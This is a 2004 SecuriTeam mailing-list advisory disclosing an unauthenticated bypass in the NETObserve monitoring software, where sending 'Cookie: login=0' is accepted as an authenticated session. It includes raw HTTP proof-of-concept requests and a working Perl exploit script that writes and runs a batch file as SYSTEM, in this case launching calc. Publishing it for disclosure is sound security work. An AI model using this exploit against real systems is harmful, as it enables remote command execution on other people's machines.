[NT] NETObserve Security Bypass Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 01/01/04

  • Next message: SecuriTeam: "[NT] TOCTOU with NT System Service Hooking"
    To: list@securiteam.com
    Date: 1 Jan 2004 12:00:49 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      NETObserve Security Bypass Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.exploreanywhere.com/no-intro.php> NETObserve is "your all in
    one solution to monitoring spouses, co-workers, children, employee's and
    just about any other person you may concerned of that is using your PC!
    NETObserve will monitor not only what is going on within your PC, but it
    can also record what is going on in front of your PC, with our
    breakthrough web cam surveillance technology! With NETObserve on your
    side, you will have remote, real-time access to your PC, allowing you to
    remotely control and monitor a PC while you are away! Read on to find out
    why NETObserve is leading the way in the cutting edge industry of PC
    monitoring, surveillance, and administration!".

    The product has been found to be very insecure, allowing a remote attacker
    (unauthenticated) to create files on the remote computer, run them, view
    abitrary files, etc all under the SYSTEM privileges.

    DETAILS

    Vulnerable systems:
     * NETObserve version 2.95.2 and prior

    Security Bypass:
    NETObserve is extremely persistent when trying to ensure that any remote
    user issuing commands to the server is properly authenticated. It seems
    that even if the remote user closes his or her browser they are required
    to login again before they can gain control of the remote system.

    Once a legitimate session with a user has been established, the browser
    confirms that the commands that the remote user is issuing are allowed to
    be performed on the remote system by sending a special HTTP authentication
    header to the NETObserve server.

    The only problem with this is the fact that any malicious individuals can
    attach the special header directly to their own specially crafted request,
    and NETObserve blindly believes that a session with a legitimate user was
    already in progress.

    The special header in question is nothing more than 'Cookie: login=0'.

    Proof of Concept Code:
    The following two HTTP requests will execute commands via the windows
    command interpreter on the remote system:

    REQUEST #1:
    --------------------------------------------------------------------------
    POST /sendeditfile HTTP/1.1
    Accept: */*
    Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat?
    Content-Type: application/x-www-form-urlencoded
    Host: AnyHostWillDo
    Content-Length: 25
    Cookie: login=0

    newfiledata=cmd+%2Fc+calc
    --------------------------------------------------------------------------

    REQUEST #2:
    --------------------------------------------------------------------------
    GET /runfile=?C:\windows\win.bat? HTTP/1.1
    Accept: */*
    Host: AnyHostWillDo
    Cookie: login=0

    --------------------------------------------------------------------------

    To change the commands to be run, just alter the 'Content-Length' of the
    first request to be the length of the line of commands, including the
    string 'newfiledata='. Then alter the data being posted under
    'newfiledata', remembering to replace spaces with '+' and encode any
    common HTTP characters, like '/' as hexadecimal values, '%2F' in this
    instance.

    These specific requests sent unaltered will execute the windows
    calculator.

    Exploit:
    #!/usr/bin/perl
    #
    # Exploit by SecurITeam
    use IO::Socket;
    unless (@ARGV == 1) { die "usage: $0 host ..." }
    $host = shift(@ARGV);
    $remote = IO::Socket::INET->new( Proto => "tcp",
                                     PeerAddr => $host,
                                     PeerPort => "http(80)",
                                     );
    unless ($remote) { die "cannot connect to http daemon on $host" }

    $remote->autoflush(1);

    $request = "POST /sendeditfile HTTP/1.1\r\
    Accept: */*\r\
    Referer: http://$host/editfile=?C:\\WINNT\\win.bat?\r\
    Content-Type: application/x-www-form-urlencoded\r\
    Host: $host\r\
    Connection: close\r\
    Content-Length: 25\r\
    Cookie: login=0\r\
    \r\
    newfiledata=cmd+%2Fc+calc";

    print $remote $request;

    sleep(1);

    $MAXLEN = 256;

    if ($remote->recv($newmsg, $MAXLEN))
    {
     print "Result: $newmsg\n";
    }

    sleep(1);

    close $remote;

    #----

    $remote = IO::Socket::INET->new( Proto => "tcp",
                                     PeerAddr => $host,
                                     PeerPort => "http(80)",
                                     );
    unless ($remote) { die "cannot connect to http daemon on $host" }

    $remote->autoflush(1);

    $request = "GET /runfile=?C:\\WINNT\\win.bat? HTTP/1.1\r\
    Accept: */*\r\
    Host: AnyHostWillDo\r\
    Cookie: login=0\r\
    \r\n";

    print $remote $request;

    sleep(1);

    $MAXLEN = 256;

    if ($remote->recv($newmsg, $MAXLEN))
    {
     print "Result: $newmsg\n";
    }

    sleep(1);

    ADDITIONAL INFORMATION

    The original advisory can be found at:
    <http://www.elitehaven.net/netobserve.txt>
    http://www.elitehaven.net/netobserve.txt.

    The information has been provided by <mailto:peter4020@hotmail.com> Peter
    Winter-Smith and <mailto:expert@securiteam.com> SecurITeam.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] TOCTOU with NT System Service Hooking"

    Relevant Pages

    • Re: remote control program
      ... The security of the interface has nothing to do with SSL. ... the security of your online banking technology also has nothing to do with SSL. ... If the technology was not properly assessed by a qualified security team then I wouldn't trust it. ... for remote work to the same location who complains about jitter and delay ...
      (Security-Basics)
    • RE: remote control program
      ... consider that you meant back-end security measures when I responded; ... I've never seen a vulnerability reported on them anywhere, ... To get in to the application one does not need credentials, ... when you attempt a remote session. ...
      (Security-Basics)
    • Re: Active Directory/HIPPA Question
      ... The client ... > roll out AD when their top priority this year is securing the applications ... Security is one of the biggest reasons. ... ESPECIALLY if you have 800 remote offices. ...
      (microsoft.public.win2000.general)
    • Re: DomainLocalServer$ is not a valid user
      ... it can be a BIG security hole. ... Local System or Network Service account on a machine makes a remote request ... things have access to your SQL Server. ...
      (microsoft.public.sqlserver.security)
    • Re: Gotomypc, remote desktop and other VPNs
      ... "Sanjay Punjab" wrote in message ... > I just started a job at a company that has a tight IT policy (most do ... > you web browse using the browser on the remote pc with realistic ... > security, how does this compare with other VPN's or similar services? ...
      (microsoft.public.windowsxp.general)